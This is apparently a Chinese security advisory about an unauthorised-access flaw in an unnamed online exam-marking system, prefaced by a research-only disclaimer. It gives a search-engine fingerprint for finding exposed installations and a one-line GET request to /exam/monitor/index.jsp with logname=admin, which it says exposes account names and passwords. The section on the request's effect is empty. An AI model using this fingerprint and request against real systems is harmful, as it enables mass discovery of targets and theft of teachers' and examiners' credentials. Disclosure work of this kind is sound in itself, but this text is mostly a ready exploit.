*免责声明:本文仅供安全研究与学习之用,严禁使用本内容进行未经授权的违规渗透测试,遵守网络安全法,共同维护网络安全,违者后果自负。
一、漏洞说明
XXX网上阅卷系统是一款专为教育领域设计的在线阅卷工具,它能够帮助教师和考试机构实现高效、准确的试卷评阅。系统/exam/monitor/index,jsp存在未授权访问,远程攻击者可通过该接口获取用户账号与密码,造成信息泄露。
二、资产识别
资产特征:
body="action=\"login_ok.jsp" && body="阅卷"三、漏洞脚本
复制漏洞脚本:
GET /exam/monitor/index.jsp?logname=admin HTTP/1.1漏洞效果:
